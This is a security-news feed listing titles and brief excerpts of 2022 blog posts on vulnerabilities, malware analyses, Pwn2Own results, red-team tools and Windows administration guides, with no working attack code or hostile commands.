• Open

    Hijacking HijackThis
    Long before endpoint event logging became a norm it was incredibly difficult to collect information about popular processes, services, paths, CLSIDs, etc.. Antivirus companies, and later sandbox companies had tones […]  ( 4 min )
  • Open

    HackerOne Announces a New Customer Pentest Setup that's More Efficient and Speeds Time to Launch
    This improved experience reduces time to launch, which is vital when your organization is up against an urgent timeline to complete a pentest due to a  ( 4 min )
  • Open

    Metastealer – filling the Racoon void
    MetaStealer is a new information stealer variant designed to fill the void following Racoon stealer suspending operations in March of this year.  ( 5 min )
    earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis scripts
    (The version of Ghidra used in this article is 10.1.2. For the Go string recovery tool release, skip ahead to Ghostrings Release.) Introduction A well-known issue with reverse engineering Go programs is that the lack of null terminators in Go strings makes recovering string definitions from compiled binaries difficult. Within a compiled Go program, many … Continue reading earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis scripts →  ( 22 min )
    Tool Release – Ghostrings
    Introduction Ghostrings is a collection of Ghidra scripts for recovering string definitions in Go binaries with P-Code analysis. A well-known issue with reverse engineering Go programs is that the lack of null terminators in Go strings makes recovering string definitions from compiled binaries difficult. Within a compiled Go program, many of the constant string values … Continue reading Tool Release – Ghostrings →  ( 5 min )
  • Open

    Start and stop a Hyper-V VM with PowerShell
    In my last article, we created a new VM for Kali Linux, mounted the ISO file to its virtual DVD drive, and changed the boot order so that the VM could boot from the virtual DVD drive. Here, I will show how to start and stop a Hyper-V with PowerShell. You'll also learn how to disable secure boot with PowerShell. Start and stop a Hyper-V VM with PowerShell first appeared on 4sysops.  ( 3 min )
  • Open

    Galleon NTS-6002-GPS Command Injection vulnerability (CVE-2022-27224)
    TL;DR Galleon Systems’ GPS NTP time server had a command injection vulnerability in the firmware of their NTS GPS device which could allow total control of the device through the […] Galleon NTS-6002-GPS Command Injection vulnerability (CVE-2022-27224) first appeared on Pen Test Partners.  ( 5 min )

  • Open

    CrateDepression | Rust Supply-Chain Attack Infects Cloud CI Pipelines with Go Malware
    Software developers using GitLab CI are being targeted with malware through a typosquatting attack, putting downstream users at risk.  ( 6 min )
  • Open

    Restore BitLocker-encrypted drives from image backup
    In this guide, I'll take a closer look at the process of restoring a BitLocker-encrypted drive from an image backup. Along the way, you'll learn about a solution for BitLocker backups that allows you to avoid re-encryption of the system drive after the restore. Restore BitLocker-encrypted drives from image backup first appeared on 4sysops.  ( 5 min )

  • Open

    Pwn2Own Vancouver 2022 - The Results
    Pwn2Own Vancouver for 2022 is underway, and the 15th anniversary of the contest has already seen some amazing research demonstrated. Stay tuned to this blog for updated results, picture, and videos from the event. We’ll be posting it all here - including the most recent Master of Pwn leaderboard. Jump to Day One results; Jump to Day Two results; Jump to Day Three results Here are the current standings for the Master of Pwn: Current as of May 18, 17:00 Pacific Day One - May 18, 2022 SUCCESS - Hector “p3rr0” Peralta was able to demonstrate an improper configuration against Microsoft Teams. He earns $150,000 and 15 Master of Pwn points. Hector “p3rr0” Peralta demonstrates a improper configuration bug on Microsoft Teams by launching calc. SUCCESS - Billy Jheng Bing-Jhong (@st424204), Muh…
  • Open

    Understanding Public and Private Bug Bounties and Vulnerability Disclosure Programs
    How Are Bug Bounty Programs and Vulnerability Disclosure Programs Different? Let’s start with the similarities. Both bug bounties and VDPs aim to  ( 6 min )
  • Open

    Detecting & Preventing Rogue Azure Subscriptions
    In this blog post we will cover why rogue subscriptions are problematic and revisit a solution published a couple of years ago on Microsoft's Tech Community. Finally, we will conclude with some hardening recommendations to restrict the creation and importation of Azure subscriptions.  ( 7 min )
  • Open

    EntropyCapture: Simple Extraction of DPAPI Optional Entropy
    EntropyCapture extracts the DPAPI optional entropy using API hooking.  ( 3 min )
  • Open

    When the trust relationship between a workstation and the primary AD domain fails
    If, at logon, you receive an error message that the trust relationship between a workstation and the primary domain failed, and you cannot logon, there are several ways to deal with the issue. These solutions also work on Windows 11 systems, where you may still log on, but the network connections tray icon in the system claims that the computer is part of an unidentified network. When the trust relationship between a workstation and the primary AD domain fails first appeared on 4sysops.
  • Open

    SANS MGT521 Security Culture Course – New Version Released
    Cybersecurity is no longer just about technology, it's about people.  ( 6 min )

  • Open

    Pwn2Own Vancouver 2022 - The Schedule
    Welcome to Pwn2Own Vancouver 2022! This year marks the 15th anniversary of the contest, and we plan on celebrating by putting some amazing research on display. For this year’s event, we have 17 contestants attempting to exploit 21 targets across multiple categories. As always, we began our contest with a random drawing to determine the order of attempts. If you missed it, you can watch the replay here. The complete schedule for the contest is below (all times Pacific [GMT -7:00]). Note: All times subject to change - You can see the results and live updates here once they become available. Entries marked with a 📷 icon will be live-streamed on YouTube, Twitch, and Twitter. Wednesday, May 18, 2022 0930: Hector “p3rr0” Peralta targeting Microsoft Teams in the Enterprise Communications categ…
  • Open

    Configure mailbox size and quota in Exchange 2016/2019 and Exchange Online
    Exchange administrators should know the maximum possible mailbox size in the environment they are managing, whether on-prem or in the cloud. In an on-prem installation, admins can use this information to prevent excessive database growth. In the cloud, excessive mailbox sizes might require an upgrade of the M365 plan. The configuration of the mailbox quota is possible both in the Exchange admin center (EAC) and via Exchange PowerShell. Configure mailbox size and quota in Exchange 2016/2019 and Exchange Online first appeared on 4sysops.  ( 6 min )
  • Open

    Interactive decompilation with rellic-xref
    By Francesco Bertolaccini Rellic is a framework for analyzing and decompiling LLVM modules into C code, implementing the concepts described in the original paper presenting the Dream decompiler and its successor, Dream++. It recently made an appearance on this blog when I presented rellic-headergen, a tool for extracting debug metadata from LLVM modules and turning […]  ( 6 min )

  • Open

    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    A guide to relaying credentials everywhere in 2022 NTLM relay is a well-known technique that has been with us for many years and never seems to go away. Almost every article about NTLM relay could start with that phrase. It could be a cliché but it’s almost true. The first implementation of this attack date […] The post We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere appeared first on SecureAuth.  ( 17 min )
  • Open

    Gin and Juice Shop: put your scanner to the test
    "Word". We heard that a lot of you have been having problems finding a truly dope vulnerable web application to wave your scanner at. As makers of the web's OG vulnerability scanner, we couldn't be le  ( 3 min )
  • Open

    How to create a Hyper-V VM with PowerShell
    In this new post of my Hyper-V management series, I will explain how create a Hyper-VM with PowerShell. How to create a Hyper-V VM with PowerShell first appeared on 4sysops.  ( 4 min )
  • Open

    Got the security controls wrong in OT and maritime? Watch as engineers work around them
    Industrial control systems security is slowly improving, partly a result of attention from regulators and lawmakers. However, we often see security controls implemented that don’t take account of the unique […] Got the security controls wrong in OT and maritime? Watch as engineers work around them first appeared on Pen Test Partners.  ( 5 min )
  • Open

    SANS Cybersecurity Leadership Curriculum
    Summary of SANS Cybersecurity Leadership Curriculum which is developing cyber security managers and leaders worldwide.  ( 9 min )

  • Open

    Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo Smart Locks Vulnerable to Relay Attacks
    Summary The Kwikset/Weiser Kevo line of smart locks support Bluetooth Low Energy (BLE) passive entry through their Touch-to-Open functionality. When a user touches the exterior portion of the lock, the lock checks that an authorized BLE device is exterior to and within a short distance of the smart lock, and then performs a cryptographic handshake … Continue reading Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo Smart Locks Vulnerable to Relay Attacks →  ( 4 min )
    Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks
    Summary The Tesla Model 3 and Model Y employ a Bluetooth Low Energy (BLE) based passive entry system. This system allows users with an authorized mobile device or key fob within a short range of the vehicle to unlock and operate the vehicle, with no user interaction required on the mobile device or key fob. … Continue reading Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks →  ( 4 min )
    Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
    Summary Many products implement Bluetooth Low Energy (BLE) based proximity authentication, where the product unlocks or remains unlocked when a trusted BLE device is determined to be nearby. Common examples of such products include automotive Phone-as-a-Key systems, residential smart locks, BLE-based commercial building access control systems, and smartphones and laptops with trusted BLE device functionality. … Continue reading Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks →  ( 4 min )
  • Open

    Update: base64dump.py Version 0.0.21
    This new version of base64dump adds decoding of netbios name encoding with lowercase letters. base64dump_V0_0_21.zip (http)MD5: 5701B6D9691E366ED5E2EE6D06689012SHA256: BE939E0225C83319A31A096DA29C1CA9D3C575DCCE9C1795814B335BD0871E92  ( 3 min )
  • Open

    g_CiOptions in a Virtualized World
    With the leaking of code signing certificates and exploits for vulnerable drivers becoming common occurrences, adversaries are adopting the kernel as their new playground. And with Microsoft making technologies like Virtualization Based Security (VBS) and Hypervisor Code Integrity (HVCI) available, I wanted to take some time to understand just how vulnerable endpoints are when faced with an attacker set on escaping to Ring-0.  ( 8 min )

  • Open

    Dragon and Knight
    For better or worse, however, not everyone processes conflict and competition the same way. This is where things get interesting (and potentially dangerous).
  • Open

    LDAPSearch Reference
    ldapsearch is a extremely powerful tool, especially for Windows Active Directory enumeration. It’s one of my primary tools when performing pentesting or red teaming against an environment with Active Directory, but also comes in quiet handy to know as many times it can come default installed or part of a base image, so its a bit Living-Off-The-Land-esq. Another point towards ldapsearch is that it’s easy to forget that Active Directory isn’t the only LDAP server in most environments and the ability to utilize a tool like this can come in extremely handy. If you want to find Active Directory LDAP servers, use the following command: $ dig -t SRV _ldap._tcp.dc._msdcs.sittingduck.info Basic Usage -x Basic Authentication, you usually use this if you are going to include a username and password…  ( 8 min )
  • Open

    Update: oledump.py Version 0.0.67
    This new version of oledump.py brings support for user defined properties and an update to plugin plugin_msg_summary.py Office documents with VSTO applications have user defined properties. These properties can be extracted with my plugin plugin_medata.py, but not with the current version of olefile.However, the development version of olefile can be used to extract these properties. […]  ( 3 min )
  • Open

    Exploiting RBCD Using a Normal User Account*
    * Caveats apply. Resource Based Constrained Delegate (RBCD) privilege escalation, described by Elad Shamir in the "Wagging the Dog" blog post is a devious way of exploiting Kerberos to elevate privileged on a local  Windows machine. All it requires is write access to local computer's domain account to modify the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute to add another account's SID. You can then use that account with the Services For User (S4U) protocols to get a Kerberos service ticket for the local machine as any user on the domain including local administrators. From there you can create a new service or whatever else you need to do. The key is how you write to the LDAP server under the local computer's domain account. There's been various approaches usually abusing authen…  ( 5 min )

  • Open

    IIS Failed Request Tracing
    Failed Request Tracing is the most important IIS feature for diagnosing and troubleshooting any problem. It helps you determine what is exactly going on with your requests and why, provided you could reproduce the problem after enabling the failed request tracing feature. IIS Failed Request Tracing first appeared on 4sysops.  ( 9 min )
  • Open

    Hunting evasive vulnerabilities
    Do you ever wonder about the vulnerabilities you've missed? Why didn't they show themselves - and will they be discovered by somebody else later? Certain vulnerabilities have a knack for evading audit  ( 3 min )
  • Open

    NVISO approved as APT Response Service Provider
    NVISO is proud to announce that it has successfully qualified as an APT Response service provider and is now recommended on the website of the German Federal Office for Information Security (BSI).   Advanced Persistent Threats (APT) are typically described as attack campaigns in which highly skilled, often state-sponsored, intruders orchestrate targeted, long-term attacks. Due to their … Continue reading NVISO approved as APT Response Service Provider →  ( 3 min )
  • Open

    Update: zipdump.py Version 0.0.22
    This is just a bugfix version. zipdump_v0_0_22.zip (http)MD5: 68F9F3809E4E1F9ADE4A4C3835CDF475SHA256: 92ED372579001C826D5AF31615B8334CC798FF2DA4AF8B7C46267BF7D995C757  ( 3 min )

  • Open

    Remove or block Chrome extensions with PowerShell
    A comment on the previous post about deploying Chrome extensions posed the question of whether PowerShell could be used to remove Chrome extensions. Remove or block Chrome extensions with PowerShell first appeared on 4sysops.  ( 6 min )
  • Open

    SecureAuth Welcomes Apple, Google, and Microsoft’s Commitment to Passwordless by FIDO Alliance
    Earlier this week, Apple, Google, and Microsoft announced plans to expand support for a common passwordless sign-in standard created by the FIDO Alliance and the World Wide Web Consortium. We are excited about this announcement and applaud the players involved. It will accelerate momentum towards eliminating passwords entirely in the future. And to be a […] The post SecureAuth Welcomes Apple, Google, and Microsoft’s Commitment to Passwordless by FIDO Alliance   appeared first on SecureAuth.  ( 4 min )
  • Open

    A Visual Summary of SANS Neurodiversity Summit 2022
    SANS Cybersecurity Blog pertaining to a summary of the SANS Neurodiversity in Cybersecurity Summit  ( 5 min )

  • Open

    D-Link DIR-1260 GetDeviceSettings Pre-Auth Command Injection Vulnerability
    EIP-3b20d7b3 A command injection vulnerability exists within the web management interface of the D-Link DIR-1260 Wi-Fi router that allows for unauthenticated attackers to execute arbitrary commands on the device with root privileges. The flaw specifically exists within the SetDest/Dest/Target arguments to the GetDeviceSettings form. The management interface is accessible over HTTP and HTTPS on the local ... Read more D-Link DIR-1260 GetDeviceSettings Pre-Auth Command Injection Vulnerability The post D-Link DIR-1260 GetDeviceSettings Pre-Auth Command Injection Vulnerability appeared first on Exodus Intelligence.  ( 1 min )
  • Open

    Putting Things in Context | Timelining Threat Campaigns
    Visualizing data is integral to threat research. See how we used this timeline analysis tool to track activity in the Ukrainian cyber conflict.  ( 7 min )
  • Open

    Azure AD certificate-based user authentication
    Certificate-based authentication is an extremely robust and secure mechanism for validating a user's identity. However, until recently, you had to deploy Active Directory Federation Services (AD FS) to make it available for Azure AD. Microsoft has recently introduced an Azure AD certificate-based authentication service (Azure CBA), which significantly simplifies implementing certificate-based authentication. Azure AD certificate-based user authentication first appeared on 4sysops.  ( 6 min )
  • Open

    Earn $200K by fuzzing for a weekend: Part 2
    Below are the writeups for two vulnerabilities I discovered in Solana rBPF, a self-described “Rust virtual machine and JIT compiler for eBPF programs”. These vulnerabilities were responsibly disclosed according to Solana’s Security Policy and I have permission from the engineers and from the Solana Head of Business Development to publish these vulnerabilities as shown below.  ( 14 min )
    Earn $200K by fuzzing for a weekend: Part 1
    By applying well-known fuzzing techniques to a popular target, I found several bugs that in total yielded over $200K in bounties. In this article I will demonstrate how powerful fuzzing can be when applied to software which has not yet faced sufficient testing.  ( 33 min )
  • Open

    Cloud Instance Metadata Services (IMDS)
    A misunderstood but deeply important feature to lock down when deploying workloads in cloud. Learn about Cloud Instance Metadata Services (IMDS) in this blog post.  ( 9 min )

  • Open

    Release of Technical Report into the AMD Security Processor
    ol{margin:0;padding:0}table td,table th{padding:0}.RmvCPDuePa-c3{padding-top:0pt;padding-bottom:0pt;line-height:1.5;orphans:2;widows:2;text-align:left;height:11pt}.RmvCPDuePa-c0{color:#000000;font-weight:400;text-decoration:none;vertical-align:baseline;font-size:11pt;font-family:"Arial";font-style:normal}.RmvCPDuePa-c7{padding-top:0pt;padding-bottom:0pt;line-height:1.5;orphans:2;widows:2;text-align:left}.RmvCPDuePa-c2{padding-top:0pt;padding-bottom:0pt;line-height:1.0;text-align:left}.RmvCPDuePa-c6{text-decoration-skip-ink:none;-webkit-text-decoration-skip:none;color:#1155cc;text-decoration:underline}.RmvCPDuePa-c4{background-color:#ffffff;max-width:468pt;padding:72pt 72pt 72pt 72pt}.RmvCPDuePa-c1{color:inherit;text-decoration:inherit}.RmvCPDuePa-c5{border:1px solid black;margin:5px}.title…  ( 2 min )
  • Open

    The May 2022 Security Update Review
    It’s the fifth second Tuesday of 2022, which also means it’s the also the fifth Patch Tuesday of the year, and it brings with it the latest security updates from Adobe and Microsoft. This is also the last release before Pwn2Own Vancouver, which means multiple participants will be holding their breath to see if their exploits still work or were patched out. Take a break from your regularly scheduled activities and join us as we review the details of their latest security offerings. Adobe Patches for May 2022 For May, Adobe released five bulletins addressing 18 CVEs in Adobe CloudFusion, InCopy, Framemaker, InDesign, and Adobe Character Animator. A total of 17 of these CVEs were reported by ZDI vulnerability researcher Mat Powell. The largest of these patches is the fix for Framemaker with 1…
  • Open

    What is Attack Resistance Management?
    A Security Survey on How to Close Your Organization's Attack Resistance Gap  ( 6 min )
  • Open

    How to check the PowerShell version
    It is important for an administrator to know what Windows PowerShell and PowerShell edition and version are installed on a system, especially due to script compatibility. This article covers all the ways to check the PowerShell version on Windows, Linux, and MacOS and offers tips and tricks. I will also discuss the changes in PowerShell 7 and PowerShell 7.2. How to check the PowerShell version first appeared on 4sysops.  ( 5 min )

  • Open

    Reflections on World Password Day: Are You Going Passwordless Yet?
    With all the talk about the growing obsolescence of passwords, it may seem strange that there exists such a thing as World Password Day. Aren’t we trying to move away from, rather than center on, passwords? This is, in fact, the real purpose of World Password Day: to draw attention to the increasing vulnerability of […] The post Reflections on World Password Day: Are You Going Passwordless Yet? appeared first on SecureAuth.  ( 5 min )
  • Open

    Introducing pyCobaltHound – Let Cobalt Strike unleash the Hound
    Introduction During our engagements, red team operators often find themselves operating within complex Active Directory environments. The question then becomes finding the needle in the haystack that allows the red team to further escalate and/or reach their objectives. Luckily, the security community has already come up with ways to assist operators in answering these questions, … Continue reading Introducing pyCobaltHound – Let Cobalt Strike unleash the Hound →
  • Open

    Enable detailed IIS errors
    By default, the IIS server is set to show detailed errors for local requests only, whereas it displays a custom error page for remote requests. This is done for security reasons, since detailed errors could reveal potentially detailed technical information about the web server and website. Enable detailed IIS errors first appeared on 4sysops.  ( 6 min )
  • Open

    Constrained environment breakout. .NET Assembly exfiltration via Internet Options
    It’s not uncommon for developers to find that they need to help their end users. For starter, the business requirements for software can be highly convoluted and technical. Working with […] Constrained environment breakout. .NET Assembly exfiltration via Internet Options first appeared on Pen Test Partners.  ( 9 min )

  • Open

    Update: cs-parse-traffic.py Version 0.0.5
    In this update for cs-parse-traffic.py, my tool to decrypt & parse Cobalt Strike traffic, I added some error handling. cs-parse-traffic_V0_0_5.zip (http)MD5: CFF6D97E816B23065F051D91B0F101A6SHA256: 69763EB4D3A163824B417A0E23131B318F5E97198F255ECE449A65D4360C6302  ( 3 min )
  • Open

    Beautiful Basics: Lesson 2
    Lessons Learned Slides Lesson 1 Lesson 2 Lesson 3 Lesson 4 Lesson 5 Lesson 6 Lesson 7 Lesson 8 Lesson 9 Lesson 10 Lesson 11 Lesson 2 - Least Privilege No one should have administrative access. All elevated access should be checked out when you need it and checked back in (automatically if possible). Just like UAC. MFA should be required, proximity or push based. And every use of a break glass account should be highly monitored I think “Least Privilege” has been harped on at least … you know what, let me wager that you can’t find a single infosec or hacking conference from 2000 until now (2022) that doesn’t have 4 talks with the words “least privilege” in the talk. But maybe a handful out of all of those talks tell you how to accomplish such a feat. The Goal Lets talk about the goal first …  ( 3 min )

  • Open

    Beautiful Basics: Lesson 1
    Lessons Learned Slides Lesson 1 Lesson 2 Lesson 3 Lesson 4 Lesson 5 Lesson 6 Lesson 7 Lesson 8 Lesson 9 Lesson 10 Lesson 11 Lesson 1 - YOU could be “Legacy” Stop thinking that just because it did or didn’t work X way when you learned it, it still does or doesn’t. That could be 20 years ago. Technology changes faster than you do. I guess that’s a bit mean for a title but here’s the thing: One of the greatest yet most challenging things about doing any job in technology is staying current. Everyone struggles to stay up to date with as much of what is going on around you. Many people specialize, which makes it easier to stay up to date with a specific thing. Yet that can lead to tunnel vision as well. All I’m trying to say here is that sometimes, the person with the least amount of “experience” in a given technology field is going to have the most open mind to what is possible. No matter how long you have been in cyber security or technology in general, you should consider your knowledge on a specific topic a point in time piece of information. At that exact moment in your life, that fact was true. This doesn’t mean that it stays that way. Take passwords for example. Everyone said “8 character passwords are secure” for decades. I’m still hearing that. Or “never write your passwords down”. This is just one example. “Never use X software, it’s insecure”, is it still?. One of the ways I stay “current” is by always challenging my knowledge of how I think things should work vs how they do. This is why during my keynote I noted when and where I leaned these lessons, there is every possibility I am complete off base with all of them. This is also why it’s my beautiful basics lesson #1. Something to always keep top of mind.  ( 1 min )

  • Open

    Attacking Systemic Security Risk, Part 1
    Our intent with FRAME is to bind the functions of model-based red teaming to security risk awareness across the extended enterprise. Among other things, we’re intentionally expanding the field of vision to include strategic and operational functions.
  • Open

    Home-Grown Red Team: Creating A Red Team Development Workstation
    Having a good red team development workstation is essential for creating payloads, testing out new tools and keeping your work organized…  ( 7 min )
  • Open

    Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777)
    Summary Ruby on Rails is a web application framework that follows the Model-view-controller (MVC) pattern. It offers some protections against Cross-site scripting (XSS) attacks in its helpers for the views. Several tag helpers in ActionView::Helpers::FormTagHelper and ActionView::Helpers::TagHelper are vulnerable against XSS because their current protection does not restrict properly the set of characters allowed in … Continue reading Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777) →  ( 3 min )
  • Open

    Disable Windows 11 widgets using Group Policy
    The widgets in Windows 11 are essentially the successors of News and interests, known from Windows 10. Like these, the widgets are often annoying in professional environments and therefore not desired. You can only completely disable Windows 11 widgets with Group Policy. Disable Windows 11 widgets using Group Policy first appeared on 4sysops.  ( 5 min )
  • Open

    Signing and Encrypting with JSON Web Tokens
    Cryptographic weaknesses often arise in applications when the core security concepts are misunderstood or misused by developers. For this reason, a thorough review of all cryptographic implementations can be a juicy target when designing an application or starting a security assessment. Often, cryptography is used in the context of communication (e.g. a key exchange or […] The post Signing and Encrypting with JSON Web Tokens appeared first on Praetorian.  ( 9 min )

  • Open

    Update: oledump.py Version 0.0.66
    This new version of oledump.py brings some fixes and an update to plugin plugin_vbaproject to decode and display the password for plaintext passwords: oledump_V0_0_66.zip (http)MD5: 20D89F0477ED7B533C2B0C6D27EC4255SHA256: F67051EF2FA3FD42206C5ADFAC807C94ECD5F7F0F6427433B366217F675D3195  ( 3 min )
  • Open

    Computer Account Relaying Vulnerabilities Part 2
    Overview Recently I’ve been working on writing a custom SMB client that implements the initial handshake and NTLM authentication functionality to perform port fingerprinting within Chariot Identify, our attack surface management product. While reading through the SMB specification, I got to thinking about Computer AdminTo Computer vulnerabilities we have exploited over the last few years […] The post Computer Account Relaying Vulnerabilities Part 2 appeared first on Praetorian.  ( 6 min )
  • Open

    Vulnerabilities in Avast And AVG Put Millions At Risk
    Two high-severity flaws in popular end user security tools allow attackers to elevate privileges and compromise devices.  ( 5 min )
  • Open

    How to install the PowerShell Active Directory module
    This guide has been updated for the latest Windows versions Windows 11 and Windows Server 2022. You'll learn how to install the Active Directory (AD) module for PowerShell Core 6.0, PowerShell 7 and Windows PowerShell. For Windows PowerShell, the tutorial describes how to install the AD module for Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Windows Server 2008 R2, Windows Server 2012 R2, and Windows Server 2016, Windows Server 2010 and Windows Server 2022. You'll also learn how to work with the AD module on other systems such as macOS or Linux with the help of PowerShell remoting. How to install the PowerShell Active Directory module first appeared on 4sysops.  ( 12 min )
  • Open

    North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
    This blog post documents some of the actions taken during the initial access phase for an attack attributed to Lazarus, along with analysis of the malware that was utilised during this phase.  ( 5 min )
  • Open

    8 Reasons You Don’t Want to Miss SANS ICS Security Summit & Training 2022
    ICS Security Summit & Training kicks off June 1. Register today.  ( 7 min )
    World Password Day – Readying Your Workforce for MFA
    Today is the perfect opportunity to talk about strong passwords.  ( 8 min )

  • Open

    Learning Machine Learning Part 3: Attacking Black Box Models
    In the first post in this series we covered a brief background on machine learning, the Revoke-Obfuscation approach for detecting…  ( 19 min )
  • Open

    What to Expect when Exploiting: A Guide to Pwn2Own Participation
    So you’ve heard of Pwn2Own and think you are up to the challenge of competing in the world’s most prestigious hacking competition. Great! We would love to have you! However, there are a few things you should know before we get started. With Pwn2Own Vancouver just around the corner, here are 10 things you need to know before participating in Pwn2Own. 1.     You need to register before the contest. We try to make this as apparent as possible in the rules, but we still have people walk into the room on the first day of the contest hoping to participate. There are a lot of logistics around Pwn2Own, so we need everyone to complete their registration before the contest starts. We can’t support anyone who wants to join on the first day of the competition. 2.     You need to answer the vetting em…
  • Open

    Sending email anonymously through Exchange Servers
    The purpose of this article is to raise awareness of the possibility of sending mail anonymously through Microsoft Exchange Servers and to show mitigations for the resulting risks. After setting up Exchange Server 2019, you might be unaware that it's possible to send mail anonymously to internal recipients by default. This means that, using PowerShell, for example, anyone in your LAN may send messages to internal accounts without revealing their identity. Sending email anonymously through Exchange Servers first appeared on 4sysops.  ( 8 min )
  • Open

    Impacket v0.10.0 Now Available
    Today, we are pleased to announce the release of the latest version of Impacket, our collection of Python classes for working with network protocols, and much more. Impacket release 0.10.0 is available now and brings several new features and enhancements including a refreshed NTLMrelayx, the Kerberos Key List attack implementation, a refactored Credential Cache, the sunsetting […] The post Impacket v0.10.0 Now Available appeared first on SecureAuth.  ( 7 min )

  • Open

    Why HackerOne Acquired Pull Request and What It Means to Our Customers
    No content preview  ( 3 min )
  • Open

    Add a language pack in Windows 11
    Microsoft started to provide language packs as Language Experience Packs (LXP) in Windows 10 1903. At the same time, LPs have still been shipped as CAB files. The duplicate formats have led to inconsistent administration of language settings. Windows 11 now removes some of these issues. Add a language pack in Windows 11 first appeared on 4sysops.  ( 6 min )
  • Open

    Themes from Real World Crypto 2022
    By William Woodruff Last week, over 500 cryptographers from around the world gathered in Amsterdam for Real World Crypto 2022, meeting in person for the first time in over two years. As in previous years, we dispatched a handful of our researchers and engineers to attend the conference, listen to talks, and schmooze observe the […]  ( 13 min )
  • Open

    A Visual Summary of SANS CloudSecNext Summit 2022
    SANS Cloud Security Blog pertaining to a summary of the SANS CloudSecNext Summit  ( 5 min )
    6 Reasons SANS 2022 Security Awareness Summit is a Must-Attend
    The agenda for the SANS 2022 Security Awareness Summit, Aug. 3-4, is live and the event is epic!  ( 6 min )

  • Open

    Shellcode: Linux on RISC-V 64-Bit
    RISC-V (pronounced “risk-five” ) is an open standard instruction set architecture (ISA) based on established reduced instruction set computer (RISC) principles. Unlike most other ISA designs, RISC-V is provided under open source licenses that do not require fees to use. … Continue reading →  ( 4 min )
  • Open

    Amplify Your Existing Risk Efforts
    Red team input can break prevailing “business as usual” perspectives, processes, priorities, and planning. Then again, an unexpected adversarial event can do the same, only worse (pay a little now or pay a lot later).
  • Open

    Announcing the Results of the 12-month DIB-VDP Pilot
    No content preview  ( 2 min )
  • Open

    Moshen Dragon’s Triad-and-Error Approach | Abusing Security Software to Sideload PlugX and ShadowPad
    Chinese-aligned APT group Moshen Dragon caught sideloading malware through multiple AV products to infect telecoms sector.  ( 5 min )
  • Open

    Configuring SSO between Active Directory and Azure using pass-through authentication
    Pass-through authentication is an alternative to AD FS and password hash synchronization in Azure AD. This technology allows users to access cloud apps after authenticating against the local Active Directory. The configuration of pass-through authentication is less complex than that of AD FS, for example. Configuring SSO between Active Directory and Azure using pass-through authentication first appeared on 4sysops.  ( 7 min )
  • Open

    Girls Day at NVISO Encourages Young Guests To Find Their Dream Job
    NVISO employees in Frankfurt and Munich showcased their work in Cybersecurity to the girls with live hacking demos, a view behind the scenes of NVISO and hands-on tips for their personal online security. Participating in the Germany- Wide “Girls Day”, we further widened the field of future career choices for the young visitors and brought … Continue reading Girls Day at NVISO Encourages Young Guests To Find Their Dream Job →
  • Open

    Beautiful Basics - Series
    Today I keynoted @BSidesVancouver. It was an honor to be asked and I had a great time. Conference Link: https://hopin.com/events/bsides-vancouver-2022/ I talked about 11 lessons learned over my career that contradict some of the edicts that are well known in the Cyber Security space. Before we get into the lessons though, let me attack the things I know many of you reading this already have queued up in your head. Counter Point 1 “All of that is well and good, but it’ll never work where I work.” Why not? Every single one of these lessons learned are things that I was told wasn’t possible. For the most part they were things I didn’t even do, they were things either already in place when I joined the company or put into place while I worked there. I saw first hand that something I was told was “impossible” was not only possible but accomplished much more than I could have imagined. Until you see something for yourself, it’s hard to go against what you are taught, but as Security Professionals isn’t that what we are supposed to do? Look beyond the scope of what is seen as “possible”? Counter Point 2 “It’s not as easy as you are making it sound.” You are right, none of this is easy. Good work hardly ever is. If you are looking for the easy solution, something that can be done in a day or a week this is not the blog series for you. Counter Point 3 “We already known all of this” Awesome! I wish I would have known these things earlier in my career. Lessons Learned Lesson 1 Lesson 2 Lesson 3 Lesson 4 Lesson 5 Lesson 6 Lesson 7 Lesson 8 Lesson 9 Lesson 10 Lesson 11  ( 1 min )
  • Open

    Vulnerability Management Resources
    SANS Vulnerability Management Resources for Cloud and Enterprise collected in one place for easy access  ( 8 min )

  • Open

    Overview of Content Published in April
    Here is an overview of content I published in April: Blog posts: Power Consumption Of A Philips Hue lamp In Off State .ISO Files With Office Maldocs & Protected View in Office 2019 and 2021 New Tool: myjson-filter.py Update: cut-bytes.py Version 0.0.14 Update: 1768.py Version 0.0.13 New Tool: pngdump.py (Beta) Update: re-search.py Version 0.0.19 Update: […]  ( 3 min )

  • Open

    Quickpost: Machine Code Infinite Loop
    Someone asked me what the byte sequence is for an infinite loop in x86 machine code (it’s something you could use while debugging, for example). That byte sequence is just 2 bytes long: EB FE. It’s something you can check with nasm, for example. File jump-infinite-loop.asm: nasm jump-infinite-loop.asm -l jump-infinite-loop.lst File jump-infinite-loop.lst: Quickpost info  ( 3 min )

  • Open

    One Year to I/O Ring: What Changed?
    […]  ( 13 min )
  • Open

    Adventures in the land of BumbleBee – a new malicious loader
    BUMBLEBEE is a new malicious loader that is being used by several threat actors and has been observed to download different malicious samples. This post provides our initial analysis  ( 5 min )
  • Open

    Analyzing VSTO Office Files
    VSTO Office files are Office document files linked to a Visual Studio Office File application. When opened, they launch a custom .NET application. There are various ways to achieve this, including methods to serve the VSTO files via an external web server. An article was recently published on the creation of these document files for … Continue reading Analyzing VSTO Office Files →
  • Open

    Update: oledump.py Version 0.0.65
    This new version of oledump.py brings a new plugin (plugin_metadata) and Python 3 fixes for 2 plugins (plugin_msi and plugin_ppt). The new plugin is actually an old unpublished plugin, that I updated recently. This plugin parses Office document metadata as defined in document [MS-OLEPS]. I started to write this in 2015 to parse the metadata […]  ( 3 min )
  • Open

    Create a Hyper-V virtual switch with PowerShell
